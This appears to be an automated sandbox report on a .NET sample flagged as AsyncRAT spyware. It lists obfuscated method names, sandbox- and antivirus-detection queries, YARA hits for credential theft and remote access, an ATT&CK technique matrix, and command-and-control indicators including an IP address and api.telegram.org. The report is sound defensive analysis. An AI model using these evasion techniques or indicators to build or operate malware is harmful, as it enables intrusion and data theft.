                  Source: tE3ZXBTP0B.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.csHigh entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
                  Source: tE3ZXBTP0B.exe, hMY5B4KaPYBa602NktZ1e4wVF.csHigh entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
                  Source: tE3ZXBTP0B.exe, jK41xlYzptzDvBwid77hpLBxe.csHigh entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
                  Source: tE3ZXBTP0B.exe, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.csHigh entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
                  Source: tE3ZXBTP0B.exe, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
                  Source: tE3ZXBTP0B.exe, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.csHigh entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
                  Source: tE3ZXBTP0B.exe, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
                  Source: tE3ZXBTP0B.exe, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.csHigh entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
                  Source: tE3ZXBTP0B.exe, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.csHigh entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
                  Source: tE3ZXBTP0B.exe, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csHigh entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
                  Source: tE3ZXBTP0B.exe, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.csHigh entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeMemory allocated: 1B040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWindow / User API: threadDelayed 9734Jump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exe TID: 7520Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: tE3ZXBTP0B.exe, 00000000.00000002.4192235897.000000001BC21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeQueries volume information: C:\Users\user\Desktop\tE3ZXBTP0B.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: tE3ZXBTP0B.exe, 00000000.00000002.4192235897.000000001BBC0000.00000004.00000020.00020000.00000000.sdmp, tE3ZXBTP0B.exe, 00000000.00000002.4192235897.000000001BC58000.00000004.00000020.00020000.00000000.sdmp, tE3ZXBTP0B.exe, 00000000.00000002.4192817279.000000001CC91000.00000004.00000020.00020000.00000000.sdmp, tE3ZXBTP0B.exe, 00000000.00000002.4190179629.000000000129C000.00000004.00000020.00020000.00000000.sdmp, tE3ZXBTP0B.exe, 00000000.00000002.4192235897.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, tE3ZXBTP0B.exe, 00000000.00000002.4190179629.0000000001355000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: tE3ZXBTP0B.exe PID: 7360, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: tE3ZXBTP0B.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.tE3ZXBTP0B.exe.d60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1742331709.0000000000D62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tE3ZXBTP0B.exe PID: 7360, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: tE3ZXBTP0B.exe PID: 7360, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: tE3ZXBTP0B.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.tE3ZXBTP0B.exe.d60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1742331709.0000000000D62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tE3ZXBTP0B.exe PID: 7360, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  Query Registry
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts131
                  Virtualization/Sandbox Evasion
                  LSASS Memory121
                  Security Software Discovery
                  Remote Desktop Protocol1
                  Clipboard Data
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Obfuscated Files or Information
                  NTDS131
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture1
                  Ingress Tool Transfer
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Software Packing
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials13
                  System Information Discovery
                  VNCGUI Input Capture13
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  tE3ZXBTP0B.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  tE3ZXBTP0B.exe100%AviraTR/Spy.Gen
                  tE3ZXBTP0B.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  89.40.31.2320%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    89.40.31.232true
                    • Avira URL Cloud: safe
                    unknown
